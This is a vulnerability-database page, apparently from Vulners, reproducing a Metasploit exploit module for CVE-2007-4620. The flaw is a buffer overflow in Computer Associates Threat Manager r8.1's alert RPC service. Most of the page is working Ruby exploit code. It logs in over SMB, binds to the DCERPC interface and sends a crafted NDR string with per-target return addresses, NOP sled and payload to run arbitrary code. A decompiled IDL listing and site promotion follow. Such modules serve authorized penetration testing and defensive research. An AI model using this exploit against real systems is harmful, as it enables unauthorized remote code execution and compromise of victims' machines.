Lucene search
K

Computer Associates Alert Notification Buffer Overflow

🗓️ 12 Apr 2008 02:26:41Reported by MC <[email protected]>Type 
metasploit
 metasploit
🔗 www.rapid7.com👁 40 Views

Computer Associates Threat Manager for the Enterprise r8.1 buffer overflow allows execution of arbitrary code by sending a specially crafted RPC request. Valid logon credentials needed

Related
Code
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = AverageRanking

  include Msf::Exploit::Remote::DCERPC
  include Msf::Exploit::Remote::SMB::Client

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Computer Associates Alert Notification Buffer Overflow',
      'Description'    => %q{
          This module exploits a buffer overflow in Computer Associates Threat Manager for the Enterprise r8.1
        By sending a specially crafted RPC request, an attacker could overflow the buffer and execute arbitrary code.
        In order to successfully exploit this vulnerability, you will need valid logon credentials to the target.
      },
      'Author'         => [ 'MC' ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'CVE', '2007-4620' ],
          [ 'OSVDB', '44040' ],
          [ 'BID', '28605' ],
        ],
      'Privileged'     => true,
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'thread',
        },
      'Payload'        =>
        {
          'Space'    => 550,
          'BadChars' => "\x00\x0a\x0d\x5c\x5f\x2f\x2e",
          'StackAdjustment' => -3500,
        },
      'Platform' => 'win',
      'Targets'  =>
        [
          [ 'Windows 2003 SP0 English',	{ 'Offset' => 979, 'Ret' => 0x77e03efb } ],
          [ 'Windows 2000 SP4 English',	{ 'Offset' => 979, 'Ret' => 0x7c30d043 } ],
          [ 'CA BrightStor ARCServe Backup 11.5 / Windows 2000 SP4 English', { 'Offset' => 207, 'Ret' => 0x7c2e7993 } ], # Yin Dehui
        ],
      'DisclosureDate' => '2008-04-04',
      'DefaultTarget' => 0))

    register_options(
      [
        OptString.new('SMBPIPE', [ true,  "The pipe name to use (alert)", 'alert']),
      ])
  end

  def exploit
    connect()
    smb_login()

    handle = dcerpc_handle('3d742890-397c-11cf-9bf1-00805f88cb72', '1.0', 'ncacn_np', ["\\#{datastore['SMBPIPE']}"])
    print_status("Binding to #{handle} ...")

    dcerpc_bind(handle)
    print_status("Bound to #{handle} ...")

    filler =  rand_text_english(target['Offset']) + [target.ret].pack('V') + make_nops(12)
    filler << payload.encoded + rand_text_english(772)

    sploit =  NDR.string(rand_text_english(rand(1024) + 1) + "\x00") + NDR.string(filler + "\x00")
    sploit << NDR.string(rand_text_english(rand(1024) + 1) + "\x00") + NDR.long(0)

    print_status("Trying target #{target.name}...")

      begin
        dcerpc_call(0x00, sploit)
        rescue Rex::Proto::DCERPC::Exceptions::NoResponse
      end

    handler
    disconnect
  end
end

=begin
/*
 * IDL code generated by mIDA v1.0.8
 * Copyright (C) 2006, Tenable Network Security
 * http://cgi.tenablesecurity.com/tenable/mida.php
 *
 *
 * Decompilation information:
 * RPC stub type: inline
 */

[ uuid(3d742890-397c-11cf-9bf1-00805f88cb72), version(1.0) ]

interface mIDA_interface
{
typedef struct struct_1 {
  long elem_1;
  [size_is(10000), length_is(elem_1)] struct struct_2 * elem_2;
} struct_1 ;

typedef struct struct_2 {
  char elem_1[52];
} struct_2 ;


/* opcode: 0x00, address: 0x00401000 */

long   sub_401000 (
  [in][ref][string] char * arg_1,
  [out][ref] struct struct_1 * arg_2,
  [in][ref][string] char * arg_3
);

}
=end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation